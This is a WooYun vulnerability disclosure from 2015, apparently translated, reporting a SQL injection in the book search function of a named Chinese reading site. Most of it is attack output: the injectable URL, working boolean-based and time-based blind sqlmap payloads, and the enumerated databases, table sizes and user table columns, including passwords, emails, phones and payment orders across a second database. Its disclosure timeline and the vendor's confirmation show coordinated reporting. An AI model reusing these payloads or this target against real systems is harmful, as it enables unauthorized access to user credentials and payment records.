WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing --------------- http://drop.zone.ci/
2015-09-12: Details have been sent to the vendor and are awaiting processing
2015-09-16: Vendor has confirmed; details disclosed to the vendor only
2015-09-26: Details disclosed to core white hats and relevant domain experts
2015-10-06: Details disclosed to regular white hats
2015-10-16: Details disclosed to intern white hats
2015-10-31: Details disclosed to the public
As stated in the title.
Search function at http://ssqj.qiye.ikanshu.cn/
Injection point captured from the request:
http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a*
sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND 8528=8528 AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND SLEEP(5) AND '%'='
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11
Databases
available databases [19]:
[*] ads
[*] banquan
[*] ca_web_pay
[*] cdps
[*] client_user_center
[*] desay
[*] information_schema
[*] qiye
[*] resource_auth
[*] resource_process
[*] skymobi_1
[*] skymobi_2
[*] skymobi_3
[*] skymobi_4
[*] skymobi_5
[*] test
[*] wap_17k
[*] xinhua
[*] zentaotask
Current database
current database: 'qiye'
Row counts
Database: qiye
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookchaptercontent | 645223  |
| bookchapter        | 645214  |
| pv_log             | 126977  |
| qiye_book          | 55327   |
| bookview           | 55034   |
| bookvolume         | 46820   |
| qiye_book_bk       | 19146   |
| book               | 7470    |
| area               | 3511    |
| tmp_id             | 3017    |
| special_book       | 2430    |
| qikan_data         | 2119    |
| `user`             | 1836    |
| doc                | 676     |
| read_history       | 527     |
| data_category      | 387     |
| special_book_1211  | 360     |
| special_book_bk    | 250     |
| news               | 170     |
| fav_history        | 137     |
| qikan              | 79      |
| zan_history        | 77      |
| activity           | 61      |
| comment            | 53      |
| user_amountlog     | 41      |
| fav_doc_history    | 40      |
| data_authorized    | 33      |
| user_feedback      | 32      |
| feeduser           | 29      |
| bookcategory       | 28      |
| comment_hd         | 24      |
| qiye               | 23      |
| special            | 11      |
| activity_winner    | 5       |
| user_amount        | 4       |
| book_off           | 1       |
+--------------------+---------+
Columns of the user table
Database: qiye
Table: user
[13 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| create_date     | datetime     |
| email           | varchar(255) |
| id              | int(11)      |
| info            | varchar(255) |
| last_login_time | datetime     |
| logo            | varchar(200) |
| name            | varchar(200) |
| nick_name       | varchar(100) |
| password        | varchar(50)  |
| qiye_id         | int(11)      |
| status          | smallint(3)  |
| tel             | varchar(50)  |
| update_date     | datetime     |
+-----------------+--------------+
Cross-database access is possible: wap_17k
Database: wap_17k
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookcomment        | 79887   |
| paylog             | 56624   |
| yeepayorder        | 20874   |
| yeepayresponse     | 20212   |
| useramountlog      | 4332    |
| userbookmark       | 3980    |
| `user`             | 3425    |
| useramount         | 3196    |
| userbookchapterlog | 1291    |
| feedback           | 620     |
| room_msg           | 126     |
| cmsbook            | 53      |
| cmscategory        | 11      |
| adminuser          | 6       |
+--------------------+---------+
yeepayorder appears to hold order information
Database: wap_17k
Table: user
[16 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| domain        | varchar(50)  |
| age           | int(5)       |
| birthDate     | date         |
| email         | varchar(255) |
| hobby         | varchar(255) |
| id            | int(11)      |
| lastLoginDate | datetime     |
| loginTimes    | int(11)      |
| logoImg       | varchar(255) |
| mobile        | varchar(20)  |
| nickName      | varchar(255) |
| password      | varchar(16)  |
| qq            | varchar(30)  |
| regTime       | datetime     |
| sex           | tinyint(2)   |
| share         | tinyint(1)   |
+---------------+--------------+
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-09-16 10:11
Thank you very much for your attention to the 17K website, and we wish you a pleasant day at work!
None yet